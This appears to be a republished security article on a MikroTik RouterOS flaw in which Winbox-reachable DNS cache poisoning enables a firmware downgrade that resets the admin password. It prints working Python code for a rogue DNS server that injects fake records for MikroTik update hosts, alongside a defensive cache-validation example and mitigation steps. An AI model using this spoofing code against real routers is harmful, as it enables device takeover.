RouterOS backdoor vulnerability puts hundreds of thousands of devices at risk

The ability to remotely downgrade devices running RouterOS (MikroTik) puts hundreds of thousands of network devices at risk. The vulnerability is a DNS cache poisoning bug reachable over the Winbox protocol, and it lets an attacker push an outdated firmware build (which resets the admin password) or a modified one onto the device.

Vulnerability details

The RouterOS terminal supports a resolve command for DNS lookups.

That request is handled by a binary called resolver. The resolver is one of many binaries that are wired into the RouterOS Winbox protocol. At a high level, "messages" sent to the Winbox port are routed to different RouterOS binaries according to a numbering scheme, so a remote client that can talk Winbox can ask the resolver to perform a lookup.

By default, the DNS server feature of RouterOS is disabled.

However, even with the server function disabled, the router still keeps its own DNS cache.

When we issue a lookup for example.com with winbox_dns_request, the router caches the result.

Since we can also choose the DNS server the request is sent to, injecting bogus addresses is trivial. For example, you can configure Philip Klaus's DNS server implementation (a small Python server built on dnslib) to always answer with an A record pointing at the IP address 192.168.88.250.

from dnslib import DNSRecord, DNSHeader, RR, A

def dns_response(data):
    # Parse the incoming query and echo its transaction id and question back,
    # flagged as an authoritative (aa) response with recursion available (ra).
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    # Whatever was asked, answer with the attacker-controlled address.
    reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()

Now, if you resolve example.com through Winbox, you can see that the router's DNS cache has been poisoned.

Of course, poisoning example.com is not very useful by itself, since the router never actually uses that name. The router does, however, need to reach upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com and download.mikrotik.com. And thanks to a second bug, all of them can be poisoned in a single reply.

from dnslib import DNSRecord, DNSHeader, RR, A

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    # The answer the router actually asked for...
    reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
    # ...plus four unsolicited records for the MikroTik update and cloud hosts,
    # with a one-week TTL so the poisoned entries stay in the cache.
    reply.add_answer(RR("upgrade.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()

The router asked for a single resolution and we sent five answers back. The router wrongly caches all of them: it never checks that an answer record actually belongs to the name it queried.
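To make the second bug concrete, here is an added example (not code from the original post or from MikroTik) that builds the same five-answer reply with nothing but the Python standard library, then feeds it to two toy caches: one that stores every answer record, which is the behaviour the article describes, and one that applies the check a resolver is supposed to apply, keeping only records whose name matches the question and whose transaction id matches the outstanding query. The packet layout follows RFC 1035; the query name, transaction id and the 192.168.88.250 address are constructed test values.

```python
"""Added example: a poisoned DNS reply and the resolver check that defeats it."""
import struct

POISON_IP = "192.168.88.250"  # attacker-controlled address, as in the article
TARGETS = ["upgrade.mikrotik.com", "cloud.mikrotik.com",
           "cloud2.mikrotik.com", "download.mikrotik.com"]


def encode_name(name):
    """Encode a dotted name as DNS labels (no compression)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(pkt, off):
    """Decode a name at pkt[off], following 0xC0 compression pointers.
    Returns (name, offset just past the name in the original stream)."""
    labels, end, jumped = [], None, False
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:  # pointer to an earlier occurrence
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off = True, ptr
            continue
        off += 1
        if length == 0:
            break
        labels.append(pkt[off:off + length].decode())
        off += length
    return ".".join(labels), (end if jumped else off)


def a_record(name, ip, ttl):
    """One A resource record: NAME TYPE=1 CLASS=IN TTL RDLENGTH RDATA."""
    rdata = bytes(int(o) for o in ip.split("."))
    return encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata


def build_query(qname, txid):
    """A plain recursive A query, like the one the router's resolver sends."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", 1, 1)


def build_poisoned_reply(query):
    """Mirror the dnslib server above: one legitimate-looking answer for the
    question plus four unsolicited records for the MikroTik hosts."""
    txid, = struct.unpack("!H", query[:2])
    qname, off = decode_name(query, 12)
    question = query[12:off + 4]            # name + QTYPE + QCLASS
    answers = a_record(qname, POISON_IP, 30)
    for host in TARGETS:
        answers += a_record(host, POISON_IP, 604800)
    flags = 0x8480                          # QR=1, AA=1, RA=1
    header = struct.pack("!HHHHHH", txid, flags, 1, 1 + len(TARGETS), 0, 0)
    return header + question + answers


def parse_reply(pkt):
    """Return (txid, [(qname, qtype, qclass)], [(name, rtype, ttl, rdata)])."""
    txid, _flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    off, questions, records = 12, [], []
    for _ in range(qd):
        name, off = decode_name(pkt, off)
        qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    for _ in range(an + ns + ar):
        name, off = decode_name(pkt, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        records.append((name, rtype, ttl, rdata))
    return txid, questions, records


def cache_naive(reply):
    """The buggy behaviour: every A record in the reply goes into the cache."""
    _, _, records = parse_reply(reply)
    return {name: (ip, ttl) for name, rtype, ttl, ip in records if rtype == 1}


def cache_strict(reply, expected_txid, asked_name):
    """Accept only what we asked for: matching txid, one question for the
    expected name, and only records carrying that exact name."""
    txid, questions, records = parse_reply(reply)
    if txid != expected_txid or len(questions) != 1:
        return {}
    if questions[0][0].lower() != asked_name.lower():
        return {}
    return {name: (ip, ttl) for name, rtype, ttl, ip in records
            if rtype == 1 and name.lower() == asked_name.lower()}


if __name__ == "__main__":
    query = build_query("example.com", 0x1234)
    reply = build_poisoned_reply(query)
    print("naive cache :", cache_naive(reply))
    print("strict cache:", cache_strict(reply, 0x1234, "example.com"))
```

The naive cache ends up with five entries, four of which the router never asked about, while the strict cache keeps only example.com and drops the reply entirely if the transaction id does not match. The name and txid checks are the minimum a resolver must do; real resolvers additionally enforce bailiwick rules on additional-section records, which is the same idea applied to delegations.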

Obviously, the attack is also useful when the router does act as a DNS server, because the poisoned cache is then served to the router's clients as well.

The poisoned cache also enables a far more serious attack: downgrading, or rolling back, the RouterOS version. The attacker reproduces the logic of the update server, changelog included, and tricks RouterOS into treating an outdated (vulnerable) version as the current one. The danger lies in what happens after such a "version update": the administrator password is reset to its default value, so the attacker can log in to the system with an empty password.


The attack works very well. The author also implements several other vectors, including ones related to planting a backdoor in the firmware, but those are not described here, and using them for illegal purposes is against the law.

Protection

Simply disabling Winbox protects you from these attacks: on the router that is the /ip service disable winbox command, and the remaining management services should be restricted to trusted source networks with the address= parameter of /ip service. Although administration via Winbox is convenient, it is better to use SSH, and to install a RouterOS release in which the resolver bug is fixed.

Source: www.habr.com